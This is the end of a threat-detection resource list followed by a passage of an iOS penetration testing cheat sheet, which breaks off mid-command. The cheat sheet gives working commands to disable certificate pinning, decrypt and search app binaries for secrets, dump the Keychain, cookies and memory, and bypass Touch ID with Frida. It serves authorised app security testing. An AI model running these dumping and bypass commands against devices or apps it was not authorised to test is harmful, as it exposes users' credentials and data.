4n6](https://thisweekin4n6.com) - A weekly roundup of digital forensics and incident response news. ## Videos - [SANS Threat Hunting and IR Summit 2017](https://www.youtube.com/playlist?list=PLfouvuAjspTr95R60Kt7ZcoerR6tYoCLA) - [SANS Threat Hunting and IR Summit 2016](https://www.youtube.com/playlist?list=PLfouvuAjspTokaa-LdUHqszL-KACkCsKT) - [BotConf 2016 - Advanced Incident Detection and Threat Hunting using Sysmon and Splunk](https://www.youtube.com/watch?v=vv_VXntQTpE) - [BSidesCharm 2017 - Detecting the Elusive: Active Directory Threat Hunting](https://www.youtube.com/watch?v=9Uo7V9OUaUw) - [BSidesAugusta 2017 - Machine Learning Fueled Cyber Threat Hunting](https://www.youtube.com/watch?v=c-c-IQ5pFXw) - [Toppling the Stack: Outlier Detection for Threat Hunters](https://www.youtube.com/watch?v=7q7GGg-Ws9s) - [BSidesPhilly 2017 - Threat Hunting: Defining the Process While Circumventing Corporate Obstacles](https://www.youtube.com/watch?v=bDdsGBCUa8I) - [Black Hat 2017 - Revoke-Obfuscation: PowerShell Obfuscation Detection (And Evasion) Using Science](https://www.youtube.com/watch?v=x97ejtv56xw) - [DefCon 25 - MS Just Gave the Blue Team Tactical Nukes](https://www.youtube.com/watch?v=LUtluTaEAUU) - [BSides London 2017 - Hunt or be Hunted](https://www.youtube.com/watch?v=19H7j_sZcKc) - [SecurityOnion 2017 - Pivoting Effectively to Catch More Bad Guys](https://www.youtube.com/watch?v=_QVhMPGtIeU) - [SkyDogCon 2016 - Hunting: Defense Against The Dark Arts](https://www.youtube.com/watch?v=mKxGulV2Z74) - [BSidesAugusta 2017 - Don't Google 'PowerShell Hunting'](https://www.youtube.com/watch?v=1mfVPLPxKTc) - [BSidesAugusta 2017 - Hunting Adversaries w Investigation Playbooks & OpenCNA](https://www.youtube.com/watch?v=8qM-DnmHNv8) - [Visual Hunting with Linked Data](https://www.youtube.com/watch?v=98MrgfTFeMo) - [RVAs3c - Pyramid of Pain: Intel-Driven Detection/Response to Increase Adversary's Cost](https://www.youtube.com/watch?v=zlAWbdSlhaQ) - [BSidesLV 2016 - Hunting on the Endpoint w/ Powershell](https://www.youtube.com/watch?v=2MrrOxsJk_M) - [Derbycon 2015 - Intrusion Hunting for the Masses A Practical Guide](https://www.youtube.com/watch?v=MUUseTJp3jM) - [BSides DC 2016 - Practical Cyborgism: Getting Start with Machine Learning for Incident Detection](https://www.youtube.com/watch?v=2FvP7nwb2UE&feature=youtu.be) - [SANS Webcast 2018 - What Event Logs? Part 1: Attacker Tricks to Remove Event Logs](https://www.youtube.com/watch?v=7JIftAw8wQY) - [Profiling And Detecting All Things SSL With JA3](https://www.youtube.com/watch?v=oprPu7UIEuk) - [ACoD 2019 - HASSH SSH Client/Server Profiling](https://www.youtube.com/watch?v=kG-kenOypLk) - [QueryCon 2018](https://www.youtube.com/playlist?list=PLlSdCcsTOu5STvaoPlr-PJE-zbYmlAGrX) - An annual conference for the osquery open-source community ([querycon.io](https://querycon.io)) - [Visual Hunting with Linked Data Graphs](https://www.youtube.com/watch?v=EpK7MkWCh1I) - [SecurityOnion Con 2018 - Introduction to Data Analysis](https://www.youtube.com/watch?v=A6hBoeSNJJw) - [Insider Threats Detection at Airbus โ€“ AI up Against Data Leakage and Industrial Espionage](https://www.youtube.com/watch?v=E2rbyoCFNY4) - [Cyber Security Investigations with Jupyter Notebooks](https://www.youtube.com/watch?v=bOOVxGnbKxI) ## Trainings - [Applied Network Defense](https://www.networkdefense.co/courses/) courses by Chris Sanders - Investigation theory, Practical threat hunting, Detection engineering with Sigma, etc. - [Security Blue Team](https://securityblue.team/) (BTL1 and BTL2 certificates) - [LetsDefend](https://letsdefend.io) - Hands-On SOC Analyst Training - [TryHackMe](https://tryhackme.com) - Hands-on cyber security training through real-world scenarios. - 13Cubed, [Investigating Windows Endpoints](https://training.13cubed.com/investigating-windows-endpoints) by Richard Davis - [HackTheBox](https://academy.hackthebox.com/) - While not directly related to threat detection, the website features training modules on general security and offensive topics that can be beneficial for junior SOC analysts. ## Labs - [DetectionLab](https://github.com/clong/DetectionLab/) - Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices. - [Splunk Boss of the SOC](https://bots.splunk.com/) - Hands-on workshops and challenges to practice threat hunting using the BOTS and other datasets. - [HELK](https://github.com/Cyb3rWard0g/HELK) - A Hunting ELK (Elasticsearch, Logstash, Kibana) with advanced analytic capabilities. - [BlueTeam Lab](https://github.com/op7ic/BlueTeam.Lab) - A detection lab created with Terraform and Ansible in Azure. - [attack_range](https://github.com/splunk/attack_range) - A tool that allows you to create vulnerable instrumented local or cloud environments to simulate attacks against and collect the data into Splunk. ## Twitter - ["Awesome Detection" Twitter List](https://twitter.com/0x4d31/lists/awesome-detection) - Twitter accounts that tweet about threat detection, hunting and DFIR. ## Threat Simulation Tools - [MITRE CALDERA](https://github.com/mitre/caldera) - An automated adversary emulation system that performs post-compromise adversarial behavior within Windows Enterprise networks. - [APTSimulator](https://github.com/NextronSystems/APTSimulator) - A Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised. - [Atomic Red Team](https://github.com/redcanaryco/atomic-red-team) - Small and highly portable detection tests mapped to the Mitre ATT&CK Framework. - [Network Flight Simulator](https://github.com/alphasoc/flightsim) - flightsim is a lightweight utility used to generate malicious network traffic and help security teams to evaluate security controls and network visibility. - [Metta](https://github.com/uber-common/metta) - A security preparedness tool to do adversarial simulation. - [Red Team Automation (RTA)](https://github.com/endgameinc/RTA) - RTA provides a framework of scripts designed to allow blue teams to test their detection capabilities against malicious tradecraft, modeled after MITRE ATT&CK. - [SharpShooter](https://github.com/mdsecactivebreach/SharpShooter) - Payload Generation Framework. - [CACTUSTORCH](https://github.com/mdsecactivebreach/CACTUSTORCH) - Payload Generation for Adversary Simulations. - [DumpsterFire](https://github.com/TryCatchHCF/DumpsterFire) - A modular, menu-driven, cross-platform tool for building repeatable, time-delayed, distributed security events. - [Empire](https://github.com/EmpireProject/Empire)([website](http://www.powershellempire.com)) - A PowerShell and Python post-exploitation agent. - [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/) - A PowerShell Post-Exploitation Framework. - [RedHunt-OS](https://github.com/redhuntlabs/RedHunt-OS) - A Virtual Machine for Adversary Emulation and Threat Hunting. RedHunt aims to be a one stop shop for all your threat emulation and threat hunting needs by integrating attacker's arsenal as well as defender's toolkit to actively identify the threats in your environment. - [Infection Monkey](https://github.com/guardicore/monkey) - An open source Breach and Attack Simulation (BAS) tool that assesses the resiliency of private and public cloud environments to post-breach attacks and lateral movement. - [Splunk Attack Range](https://github.com/splunk/attack_range) - A tool that allows you to create vulnerable instrumented local or cloud environments to simulate attacks against and collect the data into Splunk. ## Threat Simulation Resources - [MITRE's Adversary Emulation Plans](https://attack.mitre.org/wiki/Adversary_Emulation_Plans) - [Awesome Red Teaming](https://github.com/yeyintminthuhtut/Awesome-Red-Teaming) - A list of awesome red teaming resources - [Red-Team Infrastructure Wiki](https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki) - Wiki to collect Red Team infrastructure hardening resources. - [Payload Generation using SharpShooter](https://www.mdsec.co.uk/2018/03/payload-generation-using-sharpshooter/) - [SpecterOps Blog](https://posts.specterops.io/) - [Threat Hunting](https://posts.specterops.io/tagged/threat-hunting) - [Advanced Threat Tactics](https://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/) - A free course on red team operations and adversary simulations. - [Signal the ATT&CK: Part 1](https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/signal-att-and-ck-part-1.html) - Modelling APT32 in CALDERA - [Red Teaming/Adversary Simulation Toolkit](https://github.com/infosecn1nja/Red-Teaming-Toolkit) - A collection of open source and commercial tools that aid in red team operations. - [C2 Matrix](https://www.thec2matrix.com/matrix) ([Google Sheets](https://docs.google.com/spreadsheets/d/1b4mUxa6cDQuTV2BPC6aA-GR4zGZi0ooPYtBe4IgPsSc)) - [adversary_emulation_library](https://github.com/center-for-threat-informed-defense/adversary_emulation_library) - An open library of adversary emulation plans designed to empower organizations to test their defenses based on real-world TTPs. ## Contribute Contributions welcome! Read the [contribution guidelines](CONTRIBUTING.md) first. ## License [![CC0](http://mirrors.creativecommons.org/presskit/buttons/88x31/svg/cc-zero.svg)](http://creativecommons.org/publicdomain/zero/1.0) To the extent possible under law, Adel &#34;0x4D31&#34; Karimi has waived all copyright and related or neighboring rights to this work.
# iOS Penetration Testing Cheat Sheet This is more of a checklist for myself. May contain useful tips and tricks. Everything was tested on Kali Linux v2023.1 (64-bit) and iPhone 7 with iOS v13.4.1 and unc0ver jailbreak v8.0.2. Check [3uTools](https://www.3u.com) if you want to jailbreak your iOS device. I have no [liability](https://github.com/ivan-sincek/ios-penetration-testing-cheat-sheet/blob/main/LICENSE) over your actions. For help with any of the tools type `<tool_name> [-h | -hh | --help]` or `man <tool_name>`. If you didn't already, read [OWASP MSTG](https://github.com/OWASP/owasp-mastg) and [OWASP MASVS](https://github.com/OWASP/owasp-masvs). You can download OWASP MSTG checklist from [here](https://github.com/OWASP/owasp-mastg/releases). Highly recommend reading [Hacking iOS Applications](https://web.securityinnovation.com/hubfs/iOS%20Hacking%20Guide.pdf) and [HackTricks - iOS Pentesting](https://book.hacktricks.xyz/mobile-apps-pentesting/ios-pentesting). Websites that you should use while writing the report: * [cwe.mitre.org/data](https://cwe.mitre.org/data) * [owasp.org/projects](https://owasp.org/projects) * [owasp.org/www-project-mobile-top-10](https://owasp.org/www-project-mobile-top-10) * [cheatsheetseries.owasp.org](https://cheatsheetseries.owasp.org/Glossary.html) * [nvd.nist.gov/vuln-metrics/cvss/v3-calculator](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator) * [nvd.nist.gov/ncp/repository](https://nvd.nist.gov/ncp/repository) * [attack.mitre.org](https://attack.mitre.org) My other cheat sheets: * [Android Testing Cheat Sheet](https://github.com/ivan-sincek/android-penetration-testing-cheat-sheet) * [Penetration Testing Cheat Sheet](https://github.com/ivan-sincek/penetration-testing-cheat-sheet) * [WiFi Penetration Testing Cheat Sheet](https://github.com/ivan-sincek/wifi-penetration-testing-cheat-sheet) Future plans: * install Burp Proxy and ZAP certificates, * test widgets, push notifications, app extensions, and Firebase, * deeplink hijacking, * WebView attacks, * disassemble, reverse engineer, and resign an IPA, * future downgrades using SHSH BLOBS. ## Table of Contents **0. [Install Tools](#0-install-tools)** * [Cydia Sources and Tools](#cydia-sources-and-tools) * [SSL Kill Switch 2](#ssl-kill-switch-2) * [Kali Linux Tools](#kali-linux-tools) * [Mobile Security Framework (MobSF)](#mobile-security-framework-mobsf) **1. [Basics](#1-basics)** * [Install/Uninstall an IPA](#installuninstall-an-ipa) * [SSH to Your iOS Device](#ssh-to-your-ios-device) * [Download/Upload Files and Directories](#downloadupload-files-and-directories) **2. [Inspect an IPA](#2-inspect-an-ipa)** * [Pull a Decrypted IPA](#pull-a-decrypted-ipa) * [Binary](#binary) * [Info.plist](#infoplist) * [AnyTrans](#anytrans) **3. [Search for Files and Directories](#3-search-for-files-and-directories)** * [NSUserDefaults](#nsuserdefaults) * [Cache.db](#cachedb) **4. [Inspect Files](#4-inspect-files)** * [Single File](#single-file) * [Multiple Files](#multiple-files) * [SQLite 3](#sqlite-3) * [Property Lister](#property-lister) * [Nuclei](#nuclei) * [Backups](#backups) **5. [Deeplinks](#5-deeplinks)** **6. [Frida](#6-frida)** * [Frida Scripts](#frida-scripts) **7. [Objection](#7-objection)** * [Bypasses](#bypasses) **8. [Repackage an IPA](#8-repackage-an-ipa)** **9. [Miscellaneous](#9-miscellaneous)** * [Monitor the System Log](#monitor-the-system-log) * [Monitor File Changes](#monitor-file-changes) * [Dump the Pasteboard](#dump-the-pasteboard) * [Get the Provisioning Profile](#get-the-provisioning-profile) **10. [Tips and Security Best Practices](#10-tips-and-security-best-practices)** **11. [Useful Websites and Tools](#11-useful-websites-and-tools)** ## 0. Install Tools ### Cydia Sources and Tools Add the following sources to Cydia: * [build.frida.re](https://build.frida.re) * [cydia.akemi.ai](https://cydia.akemi.ai) * [repo.co.kr](https://repo.co.kr) * [havoc.app](https://havoc.app) * [julioverne.github.io](https://julioverne.github.io) Install required tools on your iOS device using Cydia: * A-Bypass * AppSync Unified * Cycript * Cydia Substrate * Debian Packager * Frida \([fix the v16+ installation issue](https://github.com/frida/frida/issues/2355#issuecomment-1386757290)\) * nano * PreferenceLoader * ReProvision Reborn * SSL Kill Switch 2 (iOS 13) * SQLite 3.x * wget * zip ### SSL Kill Switch 2 The following project is the original SSL Kill Switch 2 project which is discontinued and not supported on devices with iOS v13 and grater. To download the most up-to-date project, check the [julioverne.github.io](https://julioverne.github.io) repository in Cydia. [SSH](#ssh-to-your-ios-device) to your iOS device, then, download and install [SSL Kill Switch 2](https://github.com/nabla-c0d3/ssl-kill-switch2/releases): ```fundamental wget https://github.com/nabla-c0d3/ssl-kill-switch2/releases/download/0.14/com.nablac0d3.sslkillswitch2_0.14.deb dpkg -i com.nablac0d3.sslkillswitch2_0.14.deb killall -HUP SpringBoard ``` Uninstall SSL Kill Switch 2: ```fundamental dpkg -r --force-all com.nablac0d3.sslkillswitch2 ``` ### Kali Linux Tools Install required tools on your Kali Linux: ```fundamental apt-get -y install docker.io systemctl start docker apt-get -y install ideviceinstaller libimobiledevice-utils libplist-utils nuclei radare2 sqlite3 sqlitebrowser xmlstarlet pip3 install frida-tools objection property-lister ``` More information about my tool can be found at [/ivan-sincek/property-lister](https://github.com/ivan-sincek/property-lister). Make sure that Frida and Objection are always up to date: ```fundamental pip3 install --upgrade frida-tools objection ``` ### Mobile Security Framework (MobSF) Install: ```fundamental docker pull opensecurity/mobile-security-framework-mobsf ``` Run: ```fundamental docker run -it --rm --name mobsf -p 8000:8000 opensecurity/mobile-security-framework-mobsf ``` Navigate to `http://localhost:8000` using your preferred web browser. Uninstall: ```fundamental docker image rm opensecurity/mobile-security-framework-mobsf ``` ## 1. Basics ### Install/Uninstall an IPA Install an IPA: ```fundamental ideviceinstaller -i someapp.ipa ``` Uninstall an IPA: ```fundamental ideviceinstaller -U com.someapp.dev ``` --- Install an IPA using [3uTools](https://www.3u.com) desktop app. Jailbreak is required. <p align="center"><img src="https://github.com/ivan-sincek/ios-penetration-testing-cheat-sheet/blob/main/img/3uTools_sideloading.jpg" alt="Sideloading an IPA using 3uTools"></p> <p align="center">Figure 1 - Sideloading an IPA using 3uTools</p> --- On your Kali Linux, start a local web server, and put an IPA in the web root directory (e.g. `somedir`): ```fundamental mkdir somedir python3 -m http.server 9000 --directory somedir ``` On your iOS device, download the IPA, long press on it, choose "Share", and install it using [ReProvision Reborn](https://havoc.app/package/rpr) iOS app. Jailbreak is required. <p align="center"><img src="https://github.com/ivan-sincek/ios-penetration-testing-cheat-sheet/blob/main/img/ReProvision_Reborn_sideloading.jpg" alt="Sideloading an IPA using ReProvision Reborn" height="600em"></p> <p align="center">Figure 2 - Sideloading an IPA using ReProvision Reborn</p> ### SSH to Your iOS Device ```fundamental ssh [email protected] ``` Default password is `alpine`. ### Download/Upload Files and Directories Tilde `~` is short for the root directory. Download a file or directory from your iOS device: ```fundamental scp [email protected]:~/somefile.txt ./ scp -r [email protected]:~/somedir ./ ``` Upload a file or directory to your iOS device: ```fundamental scp somefile.txt [email protected]:~/ scp -r somedir [email protected]:~/ ``` Use `nano` to edit files directly on your iOS device. ## 2. Inspect an IPA ### Pull a Decrypted IPA Pull a decrypted IPA from your iOS device: ```bash git clone https://github.com/AloneMonkey/frida-ios-dump && cd frida-ios-dump && pip3 install -r requirements.txt python3 dump.py -o decrypted.ipa -P alpine -p 22 -H 192.168.1.10 com.someapp.dev ``` If you want to pull an encrypted IPA from your iOS device, see section [9. Repackage an IPA](#8-repackage-an-ipa) and [AnyTrans](#anytrans). To unpack e.g. `someapp.ipa` or `decrypted.ipa` (preferred), run: ```fundamental unzip decrypted.ipa ``` You should now see the unpacked `Payload` directory. ### Binary Navigate to `/Payload/someapp.app/` directory. There, you will find a binary which have the same name and no file type (i.e. `someapp`). Search the binary for specific keywords: ```bash rabin2 -zzzqq someapp | grep -Pi 'keyword' rabin2 -zzzqq someapp | grep -Pi 'hasOnlySecureContent|javaScriptEnabled|UIWebView|WKWebView' ``` WebViews can sometimes be very subtle, e.g. they could be hidden as a link to terms of agreement, privacy policy, about the software, referral, etc. Search the binary for endpoints, deeplinks, sensitive data, comments, etc. For more examples, see section [4. Inspect Files](#4-inspect-files). Search the binary for weak hash algorithms, insecure random functions, insecure memory allocation functions, etc. For the best results, use [MobSF](#mobile-security-framework-mobsf). --- Download the latest [AppInfoScanner](https://github.com/kelvinBen/AppInfoScanner/releases), install the requirements, and then extract and resolve endpoints from the binary: ```fundamental pip3 install -r requirements.txt python3 app.py ios -i someapp ``` ### Info.plist Navigate to `/Payload/someapp.app/` directory. There, you will find a property list file with the name `Info.plist`. Extract URL schemes from the property list file: ```bash xmlstarlet sel -t -v 'plist/dict/array/dict[key = "CFBundleURLSchemes"]/array/string' -nl Info.plist | sort -uf | tee url_schemes.txt ``` Search the property list file for endpoints, sensitive data \[in Base64 encoding\], etc. For more examples, see section [4. Inspect Files](#4-inspect-files). ### AnyTrans Export an IPA using [AnyTrans](https://www.imobie.com/anytrans) desktop application. Excellent for iOS backups too. <p align="center"><img src="https://github.com/ivan-sincek/ios-penetration-testing-cheat-sheet/blob/main/img/anytrans_download.png" alt="Download an IPA using AnyTrans"></p> <p align="center">Figure 3 - Download an IPA using AnyTrans</p> <p align="center"><img src="https://github.com/ivan-sincek/ios-penetration-testing-cheat-sheet/blob/main/img/anytrans_export.png" alt="Export an IPA using AnyTrans"></p> <p align="center">Figure 4 - Export an IPA using AnyTrans</p> ## 3. Search for Files and Directories Search for files and directories from the root directory: ```bash find / -iname '*keyword*' ``` Search for files and directories in the app specific directories (run `env` in [Objection](#7-objection)): ```bash cd /private/var/containers/Bundle/Application/XXX...XXX/ cd /var/mobile/Containers/Data/Application/YYY...YYY/ ``` If you want to download a whole directory from your iOS device, see section [Download/Upload Files and Directories](#downloadupload-files-and-directories). I preffer downloading the app specific directories, and then doing the [file inspection](#4-inspect-files) on my Kali Linux. Search for files and directories from the current directory: ```bash find . -iname '*keyword*' for keyword in 'access' 'account' 'admin' 'card' 'cer' 'conf' 'cred' 'customer' 'email' 'history' 'info' 'json' 'jwt' 'key' 'kyc' 'log' 'otp' 'pass' 'pem' 'pin' 'plist' 'priv' 'refresh' 'salt' 'secret' 'seed' 'setting' 'sign' 'sql' 'token' 'transaction' 'transfer' 'tar' 'txt' 'user' 'zip' 'xml'; do find . -iname "*${keyword}*"; done ``` ### NSUserDefaults Search for files and directories in [NSUserDefaults](https://developer.apple.com/documentation/foundation/nsuserdefaults) insecure storage directory: ```bash cd /var/mobile/Containers/Data/Application/YYY...YYY/Library/Preferences/ ``` Search for sensitive data in property list files inside NSUserDefaults insecure storage directory: ```fundamental scp [email protected]:/var/mobile/Containers/Data/Application/YYY...YYY/Library/Preferences/com.someapp.dev.plist ./ plistutil -f xml -i com.someapp.dev.plist ``` ### Cache.db By default, NSURLSession class stores data such as HTTP requests and responses in Cache.db unencrypted database file. Search for sensitive data in property list files inside Cache.db unencrypted database file: ```fundamental scp [email protected]:/var/mobile/Containers/Data/Application/YYY...YYY/Library/Caches/com.someapp.dev/Cache.db ./ property-lister -db Cache.db -o plists ``` Cache.db is unencrypted and backed up by default, and as such, should not contain any sensitive data after user logs out - it should be cleared by calling [removeAllCachedResponses\(\)](https://developer.apple.com/documentation/foundation/urlcache/1417802-removeallcachedresponses). ## 4. Inspect Files Inspect memory dumps, binaries, files inside [an unpacked IPA](#pull-a-decrypted-ipa), files inside the app specific directories, or any other files. After you finish testing \[and logout\], don't forget to [download](#downloadupload-files-and-directories) the app specific directories and inspect all the files inside. Inspect what is new and what still persists after logout. **Don't forget to extract Base64 strings from property list files as you might find sensitive data.** There will be some false positive results since the regular expressions are not perfect. I prefer to use `rabin2` over `strings` because it can read Unicode characters. On your iOS device, try to modify app's files to test the filesystem checksum validation, i.e. to test the file integrity validation. ### Single File Search for hardcoded sensitive data: ```bash rabin2 -zzzqq somefile | grep -Pi '[^\w\d]+(basic|bearer)\ .+' rabin2 -zzzqq somefile | grep -Pi '(access|account|admin|basic|bearer|card|conf|cred|customer|email|history|id|info|jwt|key|kyc|log|otp|pass|pin|priv|refresh|salt|secret|seed|setting|sign|token|transaction|transfer|user)\w*(?:\"\ *\:|\ *\=).+' rabin2 -zzzqq somefile | grep -Pi '([^\w\d]+(to(\_|\ )do|todo|note)\ |\/\/|\/\*|\*\/).+' ``` Extract URLs, deeplinks, IPs, etc.: ```bash rabin2 -zzzqq somefile | grep -Po '\w+\:\/\/[\w\-\.\@\:\/\?\=\%\&\#]+' | sort -uf | tee urls.txt rabin2 -zzzqq somefile | grep -Po '(\b25[0-5]|\b2[0-4][0-9]|\b[01]?[0-9][0-9]?)(\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){3}' | sort -uf | tee ips.txt ``` Extract all strings and decode Base64 strings: ```bash rabin2 -zzzqq somefile | sort -uf > strings.txt grep -Po '(?:([a-zA-Z0-9\+\/]){4})*(?:(?1){4}|(?1){3}\=|(?1){2}\=\=)' strings.txt | sort -uf > base64.txt for string in $(cat base64.txt); do res=$(echo "${string}" | base64 -d 2>/dev/null | grep -PI '[\s\S]+'); if [[ ! -z $res ]]; then echo -n "${string}\n${res}\n\n"; fi; done | tee base64_decoded.txt ``` ### Multiple Files Search for hardcoded sensitive data: ```bash IFS=$'\n'; for file in $(find . -type f); do echo -n "\nFILE: \"${file}\"\n"; rabin2 -zzzqq "${file}" 2>/dev/null | grep -Pi '[^\w\d]+(basic|bearer)\ .+'; done IFS=$'\n'; for file in $(find . -type f); do echo -n "\nFILE: \"${file}\"\n"; rabin2 -zzzqq "${file}" 2>/dev/null | grep -Pi '(access|account|admin|basic|bearer|card|conf|cred|customer|email|history|id|info|jwt|key|kyc|log|otp|pass|pin|priv|refresh|salt|secret|seed|setting|sign|token|transaction|transfer|user)\w*(?:\"\ *\:|\ *\=).+'; done IFS=$'\n'; for file in $(find . -type f); do echo -n "\nFILE: \"${file}\"\n"; rabin2 -zzzqq "${file}" 2>/dev/null | grep -Pi '([^\w\d]+(to(\_|\ )do|todo|note)\ |\/\/|\/\*|\*\/).+'; done ``` Extract URLs, deeplinks, IPs, etc.: ```bash IFS=$'\n'; for file in $(find . -type f); do rabin2 -zzzqq "${file}" 2>/dev/null; done | grep -Po '\w+\:\/\/[\w\-\.\@\:\/\?\=\%\&\#]+' | grep -Piv '\.(css|gif|jpeg|jpg|ogg|otf|png|svg|ttf|woff|woff2)' | sort -uf | tee urls.txt IFS=$'\n'; for file in $(find . -type f); do rabin2 -zzzqq "${file}" 2>/dev/null; done | grep -Po '(\b25[0-5]|\b2[0-4][0-9]|\b[01]?[0-9][0-9]?)(\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){3}' | sort -uf | tee ips.txt ``` Extract all strings and decode Base64 strings: ```bash IFS=$'\n'; for file in $(find . -type f); do rabin2 -zzzqq "${file}" 2>/dev/null; done | sort -uf > strings.txt grep -Po '(?:([a-zA-Z0-9\+\/]){4})*(?:(?1){4}|(?1){3}\=|(?1){2}\=\=)' strings.txt | sort -uf > base64.txt for string in $(cat base64.txt); do res=$(echo "${string}" | base64 -d 2>/dev/null | grep -PI '[\s\S]+'); if [[ ! -z $res ]]; then echo -n "${string}\n${res}\n\n"; fi; done | tee base64_decoded.txt ``` ### SQLite 3 Use [SCP](#downloadupload-files-and-directories) to download database files, and then open them using [DB Browser for SQLite](https://sqlitebrowser.org). To inspect the content, navigate to `Browse Data` tab, expand `Table` dropdown menu, and select the desired table. <p align="center"><img src="https://github.com/ivan-sincek/ios-penetration-testing-cheat-sheet/blob/main/img/sqlite.png" alt="SQLite"></p> <p align="center">Figure 5 - DB Browser for SQLite</p> --- To inspect/edit database files on your iOS device, use [SQLite 3](#cydia-sources-and-tools); [SSH](#ssh-to-your-ios-device) to your iOS device and run the following commands: ```sql sqlite3 somefile .dump .tables SELECT * FROM sometable; .quit ``` [Property Lister](#property-lister) will dump all databases in plain-text automatically. ### Property Lister Unpack e.g. `someapp.ipa` or [decrypted.ipa](#pull-a-decrypted-ipa) (preferred). Dump all the databases, and extract and convert all the property list files inside an IPA: ```fundamental property-lister -db Payload -o results_db property-lister -pl Payload -o results_pl ``` Repeat the same for [the app specific directories](#3-search-for-files-and-directories). ### Nuclei Download mobile Nuclei templates: ```fundamental git clone https://github.com/optiv/mobile-nuclei-templates ~/mobile-nuclei-templates ``` Unpack e.g. `someapp.ipa` or [decrypted.ipa](#pull-a-decrypted-ipa) (preferred). Search for hardcoded sensitive data: ```bash echo Payload | nuclei -t ~/mobile-nuclei-templates/Keys -o nuclei_keys_results.txt cat nuclei_keys_results.txt | grep -Po '(?<=\]\ ).+' | sort -uf > nuclei_keys_results_sorted.txt ``` ### Backups Get your iOS device UDID: ```fundamental idevice_id -l ``` Create a backup: ```bash idevicebackup2 backup --full -u $(idevice_id -l) ./backup ``` App should not backup any sensitive data. Restore from a backup: ```bash idevicebackup2 restore -u $(idevice_id -l) ./backup ``` --- Browse backups using [iExplorer](https://macroplant.com/iexplorer) (demo) for Windows OS. There are many other iOS backup tools, but they cannot browse app specific directories. iExplorer's default directory for storing iOS backups: ```fundamental C:\Users\%USERNAME%\AppData\Roaming\Apple Computer\MobileSync\Backup ``` You can place your backups in either this directory or change it in settings. <p align="center"><img src="https://github.com/ivan-sincek/ios-penetration-testing-cheat-sheet/blob/main/img/iexplorer.png" alt="iExplorer"></p> <p align="center">Figure 6 - iExplorer</p> <p align="center"><img src="https://github.com/ivan-sincek/ios-penetration-testing-cheat-sheet/blob/main/img/iexplorer_browse.png" alt="Browse a backup using iExplorer"></p> <p align="center">Figure 7 - Browse a backup using iExplorer</p> ## 5. Deeplinks Create an HTML template to manually test deeplinks: ```bash mkdir ios_deeplinks # multiple URL schemes for scheme in $(cat url_schemes.txt); do for url in $(cat urls.txt | grep -Poi "${scheme}\:\/\/.+"); do if [[ ! -z $url ]]; then echo -n "<a href='${url}'>${url}</a>\n<br><br>\n" | tee -a "ios_deeplinks/${scheme}_deeplinks.html"; fi; done; done # single URL scheme scheme="somescheme"; for string in $(cat urls.txt | grep -Poi "${scheme}\:\/\/.+"); do echo -n "<a href='${string}'>${string}</a>\n<br><br>\n"; done | tee -a "ios_deeplinks/${scheme}_deeplinks.html" python3 -m http.server 9000 --directory ios_deeplinks ``` For `url_schemes.txt` see section [Info.plist](#infoplist), and for `urls.txt` see section [4. Inspect Files](#4-inspect-files). --- Fuzz deeplinks using [ios-url-scheme-fuzzing](https://codeshare.frida.re/@ivan-sincek/ios-url-scheme-fuzzing) script with [Frida](#6-frida): ```fundamental frida -U -no-pause -l ios-url-scheme-fuzzing.js -f com.someapp.dev frida -U -no-pause --codeshare ivan-sincek/ios-url-scheme-fuzzing -f com.someapp.dev ``` Check the source code for more instructions. You can also paste the whole source code directly into Frida and call the methods as you prefer. --- Sometimes, deeplinks can bypass biometrics. ## 6. Frida Useful resources: * [frida.re](https://frida.re/docs/home) * [learnfrida.info](https://learnfrida.info) * [codeshare.frida.re](https://codeshare.frida.re) * [github.com/dweinstein/awesome-frida](https://github.com/dweinstein/awesome-frida) * [github.com/interference-security/frida-scripts](https://github.com/interference-security/frida-scripts) * [github.com/m0bilesecurity/Frida-Mobile-Scripts](https://github.com/m0bilesecurity/Frida-Mobile-Scripts) List processes: ```bash frida-ps -Uai frida-ps -Uai | grep -i 'keyword' ``` Get PID for a specified keyword: ```bash frida-ps -Uai | grep -i 'keyword' | cut -d ' ' -f 1 ``` Discover internal methods/calls: ```bash frida-discover -U -f com.someapp.dev | tee frida_discover.txt ``` Trace internal methods/calls: ```bash frida-trace -U -p 1337 frida-trace -U -p 1337 -i 'recv*' -i 'send*' ``` ### Frida Scripts Bypass biometrics using [ios-touch-id-bypass](https://codeshare.frida.re/@ivan-sincek/ios-touch-id-bypass) script: ```fundamental frida -U -no-pause -l ios-touch-id-bypass.js -f com.someapp.dev frida -U -no-pause --codeshare ivan-sincek/ios-touch-id-bypass -f com.someapp.dev ``` On the touch ID prompt, press `Cancel`. I prefer to use the built-in method in [Objection](#bypasses). --- Hook all classes and methods using [ios-hook-classes-methods](https://codeshare.frida.re/@ivan-sincek/ios-hook-classes-methods) script: ```fundamental frida -U -no-pause -l ios-hook-classes-methods.js -f com.someapp.dev frida -U -no-pause --codeshare ivan-sincek/ios-hook-classes-methods -f com.someapp.dev ``` ## 7. Objection Useful resources: * [github.com/sensepost/objection](https://github.com/sensepost/objection) Run: ```fundamental objection -g com.someapp.dev explore ``` Run a [Frida](#6-frida) script in Objection: ```fundamental import somescript.js objection -g com.someapp.dev explore --startup-script somescript.js ``` Get information: ```fundamental ios info binary ios plist cat Info.plist ``` Get environment variables: ```fundamental env ``` Get HTTP cookies: ```fundamental ios cookies get ``` Dump Keychain, NSURLCredentialStorage, and NSUserDefaults: ```fundamental ios keychain dump ios nsurlcredentialstorage dump ios nsuserdefaults get ``` Sensitive data such as app's PIN, password, etc. should not be stored as a plain-text in the keychain; instead, they should be hashed as an additional level of protection. Dump app's memory to a file: ```fundamental memory dump all mem.dmp ``` Dump app's memory after e.g. 10 minutes of inactivity, then, check if sensitive data is still in the memory, see section [4. Inspect Files](#4-inspect-files). **In case Objection detaches from the app, use the process ID to attach it back without restarting the app.** Search app's memory directly: ```bash memory search 'somestring' --string ``` List classes and methods: ```bash ios hooking list classes ios hooking search classes 'keyword' ios hooking list class_methods 'someclass' ios hooking search methods 'keyword' ``` Hook on a class or method: ```bash ios hooking watch class 'someclass' ios hooking watch method 